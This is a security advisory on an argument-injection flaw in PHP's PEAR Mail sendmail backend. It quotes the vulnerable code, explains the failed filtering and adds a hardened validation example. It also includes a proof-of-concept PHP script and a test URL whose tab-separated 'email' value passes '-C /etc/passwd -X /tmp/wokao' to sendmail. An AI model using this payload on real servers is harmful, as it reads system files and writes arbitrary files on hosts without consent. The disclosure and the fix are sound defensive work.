Vulnerability Description: PEAR (PHP Extension and Application Repository) is the official open-source class library of PHP. It collects commonly needed functionality for PHP development into reusable classes covering page presentation, database access, file operations, data structures, caching, network protocols and many other areas, so that developers do not have to write them from scratch; in short, PEAR is PHP's equivalent of CPAN. 80sec found that the PEAR Mail module has a security vulnerability: under certain conditions a user can read and write arbitrary files on the host with the web server's privileges, and from there take control of the host and execute PHP code.
Vulnerability analysis: the PEAR Mail package relies on escapeshellcmd() to filter the user-supplied sender address that it places on the sendmail command line, and that filtering is insufficient. By submitting a specially crafted address, a user can pass additional options to sendmail and thereby read and write arbitrary files on the operating system.
Sendmail.php
......
    if (!isset($from)) {
        return PEAR::raiseError('No from address given.');
    } elseif (strpos($from, ' ') !== false ||   // only a literal space is rejected
              strpos($from, ';') !== false ||
              strpos($from, '&') !== false ||
              strpos($from, '`') !== false) {
        return PEAR::raiseError('From address specified with dangerous characters.');
    }
    // escapeshellcmd() escapes shell metacharacters but does not prevent the
    // value from being split into further sendmail options.
    $from = escapeShellCmd($from);
    $mail = @popen($this->sendmail_path . (!empty($this->sendmail_args) ? ' ' . $this->sendmail_args : '') . " -f$from -- $recipients", 'w');
    if (!$mail) {
        return PEAR::raiseError('Failed to open sendmail [' . $this->sendmail_path . '] for execution.');
    }
......
We can see that the $from variable is not completely filtered. The blacklist only looks for a literal space, and escapeshellcmd() replaces the equals character with nothing, so the space check can be bypassed (the test URL in this advisory uses %09, a tab, as the separator, which the check for ' ' never matches but which the shell still treats as whitespace). escapeshellcmd() also does nothing to stop additional options from being passed, so the injected text reaches sendmail as extra command-line parameters, which is where the vulnerability lies.
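The following is an added example written for this page, not PEAR's code and not part of the original advisory. It shows how the sender check could be written so that the gaps described above are closed: every kind of whitespace is rejected rather than only a space, a leading dash is refused, the address must parse as an e-mail address, and escapeshellarg() is used so that each value reaches sendmail as exactly one argument. The function names, the sendmail path and the sample inputs are assumptions made for the example; the tab-separated sample mirrors the shape of the test URL in this advisory.

```php
<?php
// Added example, not PEAR's code. Closes the gaps in the excerpt above: the
// original rejects only a literal space and trusts escapeshellcmd(), which
// neither rejects tabs nor stops extra options from reaching sendmail.
// validate_sender() and build_sendmail_cmd() are names chosen for this example.

function validate_sender($from)
{
    // Reject every kind of whitespace (space, tab, CR, LF, ...): any of them
    // would let the shell split the value into additional sendmail arguments.
    if (!is_string($from) || $from === '' || preg_match('/\s/', $from)) {
        return false;
    }
    // A leading '-' could be read as an option; refuse it outright.
    if ($from[0] === '-') {
        return false;
    }
    // Require a syntactically valid address. This rules out ';' and other
    // characters outside the address grammar; note that '&' and '`' are
    // legal in an address, so escapeshellarg() below remains the real
    // safeguard against shell interpretation.
    if (filter_var($from, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    return $from;
}

function build_sendmail_cmd($sendmail_path, $from, $recipients)
{
    $from = validate_sender($from);
    if ($from === false) {
        return false;
    }
    // escapeshellarg() quotes each value as ONE argument, so even if the
    // validation above were ever relaxed, whitespace could not create new
    // options. "--" ends option parsing before the recipient list.
    $argv = array($sendmail_path, escapeshellarg('-f' . $from), '--');
    foreach ((array) $recipients as $rcpt) {
        $rcpt = validate_sender($rcpt);   // the same rules apply to recipients
        if ($rcpt === false) {
            return false;
        }
        $argv[] = escapeshellarg($rcpt);
    }
    return implode(' ', $argv);
}

// Constructed inputs for demonstration; the second mirrors the tab-separated
// value from the test URL in this advisory.
$samples = array(
    'user@example.com',
    "xxxxx\t-C\t/etc/passwd\t-X\t/tmp/wokao\tzzz@x\t.com",
    '-x@example.com',
    'a;b@example.com',
);
foreach ($samples as $s) {
    $cmd = build_sendmail_cmd('/usr/sbin/sendmail', $s, array('rcpt@example.org'));
    printf("%-55s => %s\n", json_encode($s), $cmd === false ? 'REJECTED' : $cmd);
}
```

Only the first sample yields a command line; the tab-separated, dash-prefixed and semicolon-containing values are all rejected before any command string is built. The design point is to replace a blacklist plus escapeshellcmd() with a whitelist plus escapeshellarg(): the former tries to enumerate bad characters and misses one, the latter defines what a valid value looks like and then quotes it as a single argument no matter what it contains. On PHP 7.4 and later, passing the argument list as an array to proc_open() avoids the shell entirely and is the stronger option.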
Vulnerability Testing:
<?php
ini_set('include_path', ini_get('include_path') . ':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
// The request parameter is placed in the From header unchanged; Mail_sendmail
// later derives the -f argument for the sendmail command line from it.
$from = "From: " . $_REQUEST['email'] . "";
$to = "xxxxxxx@zzzz.com";
$subj = "subscription request";
$body = "subscribe me";
$cc = "";
$bcc = "";
$hdrs = array(
    "To" => $to,
    "Cc" => $cc,
    "Bcc" => $bcc,
    "From" => $from,
    "Subject" => $subj,
);
$body = "test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>
http://www.80sec.com/index.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3
Requesting a URL of this form against the test script above triggers the vulnerability.
Vulnerability impact: All PEAR Mail function packages
Vulnerability status: official notification
Arbitrary file read/write vulnerability in the PHP PEAR Mail package (original advisory):
http://www.80sec.com/php-pear-mail-package-security-hol.html